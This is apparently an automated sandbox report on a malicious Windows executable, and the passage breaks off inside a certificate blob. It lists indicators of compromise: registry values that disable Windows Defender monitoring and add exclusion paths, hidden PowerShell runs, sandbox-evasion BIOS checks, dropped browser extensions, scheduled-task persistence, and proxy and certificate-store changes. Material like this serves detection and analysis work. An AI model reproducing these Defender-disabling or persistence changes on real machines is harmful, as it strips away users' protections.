Analysis
-
max time kernel
104s -
max time network
106s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
02/06/2024, 01:08
Static task
static1
Behavioral task
behavioral1
Sample
36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe
Resource
win7-20231129-en
General
-
Target
36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe
-
Size
7.2MB
-
MD5
aab40ee1a58b9d0dc287172af3080932
-
SHA1
217722743119de9c2a52c975edef82aae2263860
-
SHA256
36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd
-
SHA512
32b0e30787dfd2c747875c1e9ffd23d4436eb282d919edf0f2de8413020f47a003a6c2ad6d0490e285d996d9e846359a8158852b9ccf64681b72fa7e1e6d9b73
-
SSDEEP
196608:91OuihDkDG9G428bAy0R9amEKyntKC6nzzkVVZnVf:3Ou+OG9GEW9amEZICQz8VZVf
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 31 1664 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 2708 powershell.exe 1580 powershell.exe 1928 powershell.EXE 2420 powershell.exe 2124 powershell.exe 2492 powershell.exe 608 powershell.exe 2052 powershell.EXE 2220 powershell.EXE 2664 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\International\Geo\Nation ukITios.exe -
Executes dropped EXE 4 IoCs
pid Process 2140 Install.exe 2120 Install.exe 1720 mLoBrhO.exe 328 ukITios.exe -
Loads dropped DLL 23 IoCs
pid Process 1936 36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe 2140 Install.exe 2140 Install.exe 2140 Install.exe 2140 Install.exe 2120 Install.exe 2120 Install.exe 2120 Install.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 1664 rundll32.exe 1664 rundll32.exe 1664 rundll32.exe 1664 rundll32.exe 2180 WerFault.exe 2180 WerFault.exe 2180 WerFault.exe 2180 WerFault.exe 2800 WerFault.exe 2800 WerFault.exe 2800 WerFault.exe 2180 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json ukITios.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json ukITios.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat ukITios.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F ukITios.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol mLoBrhO.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ukITios.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 ukITios.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol mLoBrhO.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 ukITios.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 ukITios.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 ukITios.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 ukITios.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini mLoBrhO.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4A9377E7E528F7E56B69A81C500ABC24 ukITios.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ukITios.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4A9377E7E528F7E56B69A81C500ABC24 ukITios.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ukITios.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 ukITios.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357 ukITios.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ukITios.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 ukITios.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini mLoBrhO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ukITios.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F ukITios.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\dlfHiRefefjU2\ornwinl.xml ukITios.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\qiyCiOa.dll ukITios.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\ZNdwwdV.xml ukITios.exe File created C:\Program Files (x86)\hsUwQAlMU\aIZmJt.dll ukITios.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ukITios.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ukITios.exe File created C:\Program Files (x86)\dlfHiRefefjU2\ZauIgZFmzJgtI.dll ukITios.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ukITios.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ukITios.exe File created C:\Program Files (x86)\hsUwQAlMU\MnQMHNC.xml ukITios.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\ZOcAWcu.dll ukITios.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\bejEKGh.xml ukITios.exe File created C:\Program Files (x86)\ZEkGlaTFWGUn\YjvIAri.dll ukITios.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job schtasks.exe File created C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job schtasks.exe File created C:\Windows\Tasks\ucrVpivlTlXwlAC.job schtasks.exe File created C:\Windows\Tasks\BjyVbWVaXyfCTlHuI.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2172 1720 WerFault.exe 62 2180 2120 WerFault.exe 29 2800 328 WerFault.exe 227 -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1056 schtasks.exe 3032 schtasks.exe 600 schtasks.exe 2456 schtasks.exe 852 schtasks.exe 2264 schtasks.exe 3044 schtasks.exe 2004 schtasks.exe 3020 schtasks.exe 2104 schtasks.exe 2736 schtasks.exe 2196 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{DB59ADA5-E8E3-4699-882D-CF0B3AF86EEA} ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates ukITios.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" ukITios.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ukITios.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-2d-21-a7-d4-d5 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-2d-21-a7-d4-d5\WpadDecisionTime = 1094db9289b4da01 ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs ukITios.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates ukITios.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople ukITios.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" ukITios.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad ukITios.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings ukITios.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{DB59ADA5-E8E3-4699-882D-CF0B3AF86EEA}\WpadNetworkName = "Network 3" ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs ukITios.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates ukITios.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ukITios.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f004a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ukITios.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA ukITios.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{DB59ADA5-E8E3-4699-882D-CF0B3AF86EEA}\2a-2d-21-a7-d4-d5 ukITios.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot ukITios.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-2d-21-a7-d4-d5\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" mLoBrhO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs ukITios.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections ukITios.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ukITios.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-2d-21-a7-d4-d5\WpadDecision = "0" ukITios.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90820e6a89b4da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs ukITios.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-2d-21-a7-d4-d5\WpadDecisionTime = 1094db9289b4da01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{DB59ADA5-E8E3-4699-882D-CF0B3AF86EEA}\2a-2d-21-a7-d4-d5 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs ukITios.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{DB59ADA5-E8E3-4699-882D-CF0B3AF86EEA}\WpadDecisionReason = "1" ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-2d-21-a7-d4-d5 ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates ukITios.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ukITios.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates ukITios.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs ukITios.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople ukITios.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs ukITios.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C ukITios.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecba